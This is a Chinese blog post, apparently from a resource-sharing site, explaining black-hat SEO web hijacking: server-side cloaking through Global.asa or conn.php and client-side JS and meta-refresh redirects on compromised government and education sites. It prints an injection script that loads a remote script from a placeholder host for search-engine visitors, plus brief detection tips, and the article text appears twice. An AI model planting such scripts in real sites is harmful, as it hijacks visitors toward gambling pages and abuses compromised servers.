背景图片
关于本站| 投稿说明| 下载说明
网页劫持seo - Ya分享网
  • 首页
  • 自学教程
    • 网络安全
    • 编程教程
    • 设计教程
    • 破解教程
    • 其他教程
  • 网站相关
    • emlog教程
    • emlog插件
    • emlog主题
    • Dz论坛主题
    • Discuz插件
    • 网页特效
    • 网站源码
  • 软件仓库
    • 安卓软件
    • 电脑软件
    • 游戏助手
  • 软件源码
    • E4a源码
    • E4a类库
    • 易语言源码
  • 各类活动
  • 每日看点
  • SEO技巧
  • 更多功能
    • 留言吐槽
    • 文章归档
    • 我的邻居
    • 公告动态
    • 广告合作
    • 关于博主
    • 我的商城


登录后,享受更多优质服务哦
大哥! 个人中心退出登录
导航菜单
  • 首页
  • 自学教程
    • 网络安全
    • 编程教程
    • 设计教程
    • 破解教程
    • 其他教程
  • 网站相关
    • emlog教程
    • emlog插件
    • emlog主题
    • Dz论坛主题
    • Discuz插件
    • 网页特效
    • 网站源码
  • 软件仓库
    • 安卓软件
    • 电脑软件
    • 游戏助手
  • 软件源码
    • E4a源码
    • E4a类库
    • 易语言源码
  • 各类活动
  • 每日看点
  • SEO技巧
  • 更多功能
    • 留言吐槽
    • 文章归档
    • 我的邻居
    • 公告动态
    • 广告合作
    • 关于博主
    • 我的商城
SEO

网页劫持seo

2019/12/18 小路  SEO技巧 7105 0

SEO-网页劫持

网页劫持是目前黑帽SEO或者说黑产最喜欢的一种网页引流方式,此手法往往通过入侵政府、教育机构网站(权重高),修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;表现形式可以是劫持跳转,也可以是劫持呈现的网页内容,目前被广泛应用于私服、博彩等暴利行业。

 


服务端劫持

服务端劫持也称为全局劫持,手法为修改网站动态语言文本,判断访问来源控制返回内容,从来达到网站劫持的目的。

asp/aspx/php劫持

Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本, 然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问,则返回正常页面。

客户端劫持

客户端劫持的手法也很多,但主要就是2种:js劫持、Header劫持。

js劫持

js劫持目的:通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。

js植入手法:可以通过入侵服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。

js劫持案例

效果:通过搜索引擎搜索点击页面(执行一段js)跳转到博彩页面;直接输入网址访问网页,跳转到404页面。

代码:


today=new Date(); today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate(); var regexp=//.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(/.[a-z0-9/-]+){1,2}///ig; var where =document.referer; if(regexp.test(where)){ document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>'); } else { window.location.href="../../404.htm"; }


分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。

header劫持

在源代码中写入以下代码:


<meta http-equiv=“refresh“ content=“10; url=https://www.yafxw.com“>


利用的就是Meta Refresh Tag(自动转向),将流量引走。

手法对比

客户端劫持与服务端区别

客户端劫持:每次访问网页从服务端获取到的网页代码都是相同的,只是控制了网页代码在浏览器中呈现的效果(比如是否进行跳转等)。

服务端劫持:改变了每次访问网页从服务端获取到的网页代码。

客户端劫持与服务端判断方法

客户端劫持的判断方法:只需观察浏览器呈现的网页前端代码,查看是否引用了不当的js,或者其它敏感内容。

服务端劫持的判断方法:可以通过观察网站后端代码,或者通过改变ip,包头等方式,观察放回源码是否不同。

结语: 网页劫持的方法还有很多,我了解的大概只是皮毛,黑帽SEO技术的水很深,前路漫漫。

 


网页劫持是目前黑帽SEO或者说黑产最喜欢的一种网页引流方式,此手法往往通过入侵政府、教育机构网站(权重高),修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;表现形式可以是劫持跳转,也可以是劫持呈现的网页内容,目前被广泛应用于私服、博彩等暴利行业。

服务端劫持

服务端劫持也称为全局劫持,手法为修改网站动态语言文本,判断访问来源控制返回内容,从来达到网站劫持的目的。

asp/aspx/php劫持

Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本, 然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问,则返回正常页面。

客户端劫持

客户端劫持的手法也很多,但主要就是2种:js劫持、Header劫持。

js劫持

js劫持目的:通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。

js植入手法:可以通过入侵服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。

js劫持案例

效果:通过搜索引擎搜索点击页面(执行一段js)跳转到博彩页面;直接输入网址访问网页,跳转到404页面。

代码:


today=new Date(); today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate(); var regexp=//.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(/.[a-z0-9/-]+){1,2}///ig; var where =document.referer; if(regexp.test(where)){ document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>'); } else { window.location.href="../../404.htm"; }
 


分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。

header劫持

在源代码中写入以下代码:


<meta http-equiv=“refresh“ content=“10; url=https://www.yafxw.com“>


利用的就是Meta Refresh Tag(自动转向),将流量引走。

手法对比

客户端劫持与服务端区别

客户端劫持:每次访问网页从服务端获取到的网页代码都是相同的,只是控制了网页代码在浏览器中呈现的效果(比如是否进行跳转等)。

服务端劫持:改变了每次访问网页从服务端获取到的网页代码。

客户端劫持与服务端判断方法

客户端劫持的判断方法:只需观察浏览器呈现的网页前端代码,查看是否引用了不当的js,或者其它敏感内容。

服务端劫持的判断方法:可以通过观察网站后端代码,或者通过改变ip,包头等方式,观察放回源码是否不同。

搜一下

 点赞:1  打赏  分享  海报

  • 打赏支付宝扫一扫
  • 打赏微信扫一扫
  • 打赏企鹅扫一扫
作者头像 作者名称 作者性别
小路
联系作者 作者主页

热门推荐

1 网站SEO必备的10款辅助工具
2 网站优化中的“占有,选择,创新”三大拿来主义
3 为什么整站排名总是很差呢?
4 网站SEO网站排名关键词下滑恢复方法
5 分享判断一个网站的好坏从那些数据分析
6 如果百度只收录一次原创,情况又会怎样?

评论列表

取消回复

    •  
      Login

      逗比的小暖

      站长 主页
      用户中心
      评论管理
      退出登陆
      • 380文章
      • 291评论
      • 3微语
  • 二零二一年02月
    一二三四五六日
    1234567
    891011121314
    15161718192021
    22232425262728
           
  • 随机文章

      • 支付宝汽车报价集生肖抽红包
        • 支付宝福卡抽6.66元心愿红包
          • 招商银行老用户抽9元话费券
            • 支付宝财运节节高领消费红包
              • 微信关注温州电信0.5元红包
  • 最新评论

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=16621217

      来了

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=123345596789

      好

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=355555666

      啦啦啦德玛西亚

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=849439519

      666牛

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=58268426674

      看累了

    • https://www.yafxw.com/content/templates/meta/Static/images/avatar.jpg

      666,流批

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=3315454805

      eyu,奥特曼

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=3102089143

      洗涤剂饿不

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=1551598097

      Yyyyyyyyyy我要看

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=3125474532

      个

  • 链接

    • 音乐外链
    • 奇妙资源网
  • 网站统计 I 当前在线:1人

    • 本站管理:2位
    • 用户总数:41位
    • 置顶文章:2篇
    • 日志总数:380篇
    • 微语总数:3条
    • 评论总数:291条
    • 标签总数:133条
    • 页面总数:7页
    • 分类总数:28个
    • 链接总数:16条
    • 运行天数:476天
    • 最后更新:2月15日
  • 用户登陆

    
    
    找回密码

    找回密码

    密码已找回?返回登陆

    用户注册

    
    
    စ
    
    已有账号?返回登陆
    Copyright © 2021Ya分享网 程序:Emlog5.31 主题:Meta 3.55 黑ICP备19007521号
    • 首页
    • Q 群
    • 搜索
    • 关于
    • 用户

    大家都在搜

    • web安全
    • 测试
    • 快手骗子
    • 优惠卷
    • DDOS
    • Epic
    • 防护软件
    • 网络信息内容服务平台
    • 博彩
    • 破解
    • emlog插件
    • 伪娘
    • 掉签名
    • 小程序
    • 火箭少女101
    • 和平精英
    • 
    • 